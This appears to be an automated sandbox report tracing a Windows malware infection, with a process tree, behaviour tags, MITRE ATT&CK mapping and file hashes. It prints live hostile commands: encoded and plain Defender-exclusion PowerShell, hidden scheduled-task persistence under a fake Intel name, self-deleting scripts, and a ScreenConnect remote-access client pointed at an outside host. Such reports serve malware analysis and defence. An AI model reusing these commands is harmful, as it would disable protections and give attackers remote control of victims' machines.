C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:87⤵PID:2384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:17⤵PID:2884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:17⤵PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:17⤵PID:6740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:17⤵PID:6748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:87⤵PID:7104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:5228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:17⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:17⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3496 /prefetch:27⤵PID:3916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"5⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1864
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:656
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUA5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018024001\7796213aa8.exe"C:\Users\Admin\AppData\Local\Temp\1018024001\7796213aa8.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5960 -
C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"C:\Users\Admin\AppData\Local\Temp\1018104001\c7ac8b2876.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6444
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018105001\4ba8da5cdc.exe"C:\Users\Admin\AppData\Local\Temp\1018105001\4ba8da5cdc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"C:\Users\Admin\AppData\Local\Temp\1018106001\c1e8d0e648.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3760
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018107001\3573f91eb8.exe"C:\Users\Admin\AppData\Local\Temp\1018107001\3573f91eb8.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 8045⤵
- Program crash
PID:6816
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018108001\4913480162.exe"C:\Users\Admin\AppData\Local\Temp\1018108001\4913480162.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 5365⤵
- Program crash
PID:7068
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018109001\804a4385fd.exe"C:\Users\Admin\AppData\Local\Temp\1018109001\804a4385fd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\cellfzj"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5148
-
-
C:\cellfzj\057af55804f941a1bfb3623a361b7ab9.exe"C:\cellfzj\057af55804f941a1bfb3623a361b7ab9.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5200
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018110001\b2b654d781.exe"C:\Users\Admin\AppData\Local\Temp\1018110001\b2b654d781.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5300 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"5⤵PID:5992
-
C:\Windows\system32\mode.commode 65,106⤵PID:6544
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5256
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:656
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6732
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6072
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"6⤵
- Views/modifies file attributes
PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"6⤵
- Executes dropped EXE
PID:5940 -
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe7⤵
- Views/modifies file attributes
PID:4876
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe7⤵
- Views/modifies file attributes
PID:1908
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE7⤵
- Scheduled Task/Job: Scheduled Task
PID:6088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe7⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7004 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2140
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018111001\c59adc6d69.exe"C:\Users\Admin\AppData\Local\Temp\1018111001\c59adc6d69.exe"4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\1018112001\68c2153f03.exe"C:\Users\Admin\AppData\Local\Temp\1018112001\68c2153f03.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6164
-
-
C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe"C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7100 -
C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe"C:\Users\Admin\AppData\Local\Temp\1018113001\47493c571e.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\1018114001\6c81dae2fe.exe"C:\Users\Admin\AppData\Local\Temp\1018114001\6c81dae2fe.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:924
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5544
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 608F846364848661854D13212C870479 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIB73A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240629609 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1460
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5636
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9CC2DD03DEC9CAFD32A4393FC77AA90C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2412
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BBEBA779DD3F0BA56340840E5746ADA3 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5844
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:4600
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5048
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6672
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=61f772e9-8983-4fd3-833d-601341ed72a3&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5764 -
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "db441856-4ed5-4403-92b8-b241d6ae3912" "User"2⤵
- Executes dropped EXE
PID:6240
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "913eccb5-6cbb-4e67-8b83-d2af233776b2" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:6584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 6680 -ip 66801⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1540 -ip 15401⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5816
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5840 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:5612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5456 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5076
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Virtualization/Sandbox Evasion
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
11Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD51bc73e4a4a10603087217fe35f0f2488
SHA1070f770a2fb676c88013398c7db9863644aef82a
SHA2562eeaff6b2ee4e9fd6df3fff677608eb025877828631a405bb2655df8d6f3b8b5
SHA512673f92f424656d5537b0819bc85cbd139e4de7410def06963caa9f961ee271f640842cd55b002a8967a44aa9c103d61bfd5cdc0b4bca4d9bb7a165f32f6b7879
-
Filesize
192KB
MD53724f06f3422f4e42b41e23acb39b152
SHA11220987627782d3c3397d4abf01ac3777999e01c
SHA256ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
SHA512509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
Filesize
3KB
MD59322751577f16a9db8c25f7d7edd7d9f
SHA1dc74ad5a42634655bcba909db1e2765f7cddfb3d
SHA256f1a3457e307d721ef5b63fdb0d5e13790968276862ef043fb62cce43204606df
SHA512bb0c662285d7b95b7faa05e9cc8675b81b33e6f77b0c50f97c9bc69d30fb71e72a7eaf0afc71af0c646e35b9eadd1e504a35d5d25847a29fd6d557f7abd903ab
-
Filesize
931B
MD5e190ad2c95cef560dd7fba3e0399346d
SHA171cbbcf0f57780b863694f6e2ebbfeeac95aa526
SHA256b1cdb6fee5e2c07ec8ecd53a1b5a771ad6cce96a0fc9b02182800ec1c2fd3022
SHA512a524972df1a2b825d8c9cda34c85fb7fa0e34fa51c3d8f0bf8e82d601dd7cb4c9c5b2efa1e77370aea93a28c87c3bd2df135261947ce3248d0e878f6fcf5174b
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD5a0486d6f8406d852dd805b66ff467692
SHA177ba1f63142e86b21c951b808f4bc5d8ed89b571
SHA256c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be
SHA512065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a
-
Filesize
152B
MD5dc058ebc0f8181946a312f0be99ed79c
SHA10c6f376ed8f2d4c275336048c7c9ef9edf18bff0
SHA256378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a
SHA51236e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize120B
MD5192c64dadb771fd3693b80d2125b1468
SHA127a90e5386aae14214c9ab0b60f5e6798fba4d23
SHA256bd9b520cb0217d085685da6e02b18c5520c1bf0cf41a62e3ed52561e13107ede
SHA51264128a202ef84208af82e0340e7c9940302b27f0a107df60d1db091739fa575ff8c341693787ea05365357a0b350e8fd7cf372827f4759e5acfba396d1fb9c16
-
Filesize
339B
MD536241a71cb5c037c9fb83a36a3a70cec
SHA12db701ea9421dfa6800d09c5c1e8845d93b9b907
SHA2563cfd309540de0ee8389d603086fd25856050a9d4c5258db6bbf8a99606906661
SHA512fc4b43a16e9be8d9da40318c4399b1553a26f0fff572f27ba1efde1b3ec22ca63d72601adaff93435fbdc235b8f1ead8879129357573b6edc2140463f0e8a495
-
Filesize
6KB
